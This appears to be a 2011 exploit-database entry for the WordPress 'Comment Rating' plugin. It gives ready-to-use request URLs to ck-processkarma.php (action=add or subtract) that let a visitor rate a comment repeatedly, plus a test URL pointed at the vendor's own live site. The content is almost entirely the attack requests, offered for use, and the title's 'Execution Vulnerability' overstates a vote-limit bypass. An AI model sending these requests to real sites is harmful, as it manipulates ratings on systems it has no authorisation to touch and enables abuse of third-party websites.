id: 15600
date: 03/15/2011
title: Wordpress plugin Comment Rating Execution Vulnerability
author: sasa1
cves: 

# Exploit Title: Wordpress plugin Comment Rating more than once in url
# Date: 14-03-2011
# Author: sasa1
# mysite: www.dev-chat.com
# Vendor: http://wealthynetizen.com
# Download: http://downloads.wordpress.org/plugin/comment-rating.zip

##################################

Exploit 4 Comment Rating more than once


Enter the URL in the browser more than once


xxxx=comment number

for @@Thumb up@@

http://site.com/wp-content/plugins/comment-rating/ck-processkarma.php?id=xxxx&action=add&path=.

++++++++++++++ OR ++++++++++++++

for @@Thumb down@@

http://site.com/wp-content/plugins/comment-rating/ck-processkarma.php?id=xxxx&action=subtract&path=.




test>>>

http://wealthynetizen.com/wp-content/plugins/comment-rating/ck-processkarma.php?id=16905&action=add&path=.

##################################

Exploit by www.dev-chat.com


#  0day.today [2023-03-27]  #